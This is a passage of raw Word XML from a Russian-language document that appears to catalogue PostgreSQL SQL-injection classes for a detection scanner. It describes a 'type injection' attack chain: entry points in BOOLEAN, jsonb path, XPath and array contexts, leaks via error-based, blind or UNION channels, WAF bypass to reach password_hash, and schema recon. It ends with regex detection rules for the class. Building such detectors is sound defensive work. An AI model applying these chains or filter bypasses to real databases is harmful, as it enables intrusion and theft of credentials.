              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>string_to_array('$x', ',')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ANY(ARRAY[$x])</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07CC72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>классический UNION-через-type-cast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3ADF92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC</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9FB9AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.x+ (все)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CE795A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Все четыре подраздела работают на PUBLIC — типовая система PG не требует privileges, только SELECT на target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B652DA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Типичная цепочка применения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3394BDBA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.11 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>точка входа</w:t>
      </w:r>
      <w:r>
        <w:t>. Сам по себе type-cast не утечёт данные — нужен downstream leak-механизм. Цепочка:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F578B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.1/2/3/4 как entry point</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий находит, где приложение конкатенирует user-input в type-specific контекст (BOOLEAN, jsonb path, XPath, array).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E5A91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leak-механизм:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B55C3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.2 (error-based) — для всех 4 подразделов через cast-error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0A21F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.3 (boolean-blind) — через 3.11.1 short-circuit или 3.11.3 xpath_exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077852CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.1 (UNION) — через 3.11.4 string_to_array breakout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D96FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 (filter bypass)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход WAF на специфические keywords (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через 3.9.5 hex inside JSONPath).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A65F579" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8 (metadata)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий читает структуру через 3.11 same или новый channel (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;'role'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через 3.11.2 без знания, что есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-ключ — recon через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSONPath).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1486F814" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Главное правило: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11 расширяет поверхность 3.1/3.2/3.3</w:t>
      </w:r>
      <w:r>
        <w:t>, добавляя type-specific entry points, которые классические SQLi-сканеры пропускают.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E7D7EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115395F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 (Error-based) vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.2 — про cast-error mechanic в общем; 3.11 — про specific cast-targets (BOOLEAN, jsonb path, xpath, array). Семантически связаны: 3.11 даёт точку, 3.2 даёт leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EABCECF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8 (Metadata) vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.8 — про каталоги PG (pg_class, pg_proc, etc.); 3.11 — про user-data структуры (JSONB-документы, XML-документы). Разные источники, общий канал (cast-error / UNION).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029C500" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 (Filter bypass) vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.9 — про encoding payload-а до парсера PG; 3.11 — про эксплуатацию правил типов после парсера. Часто комбинируются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7756C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked) vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ортогональны. 3.11 — про single-statement type-injection; 3.5 — про multi-statement. Не пересекаются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76482E6F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>rules.py — готовое правило для класса TYPE_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A4FFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сводный regex по всем четырём подразделам 3.11. Структура такая же, как для предыдущих категорий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B5388" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># app/schemas/sql.py — добавить в VulnerabilityClass enum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D07234" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class VulnerabilityClass(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA2104" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42914E0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    TYPE_INJECTION = "type_injection"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6C1A05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2F0EBA"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7154D866" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass.TYPE_INJECTION: 7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFEB14C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE48E58"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3A35A8BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"type_inj_boolean_concat": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3796AAA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.1 — concat в bool-context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CD222" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"=\s*['\"][^'\"]{0,20}['\"]\s*\|\|\s*\(\s*SELECT\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB62E8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E24CD03" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D9B440" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"type_inj_jsonb_path": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE4ABA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.2 — concat в JSON path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159A0C8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:-&gt;&gt;?|#&gt;&gt;?)\s*['\"][^'\"]*['\"]?\s*\|\||"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E01965" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # JSONPath DSL with suspicious operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B1CEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"@@\s*['\"][^'\"]*?(?:like_regex|\.\*\*|\?\([^)]+\))",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD14C6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D980A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566E7227" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"type_inj_xpath": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E16AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.3 — xpath/xpath_exists/xmltable с runtime-вычисленным выражением</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B593395" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bxpath(?:_exists)?\s*\(\s*['\"][^'\"]*['\"]?\s*\|\||"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181CA636" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bxmltable\s*\(\s*['\"][^'\"]*['\"]?\s*\|\||"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E21193F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # подозрительные XPath patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D23F21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bxpath(?:_exists)?\s*\(\s*['\"][^'\"]*?(?://|/text\(\)|/name\(\)|starts-with|contains)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACCCC7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE198D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B701FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"type_inj_array": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D39FCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.4 — string_to_array с concat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A635FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bstring_to_array\s*\(\s*['\"][^'\"]*['\"]?\s*\|\||"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7225CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ANY с ARRAY-constructor + concat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F20B263" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
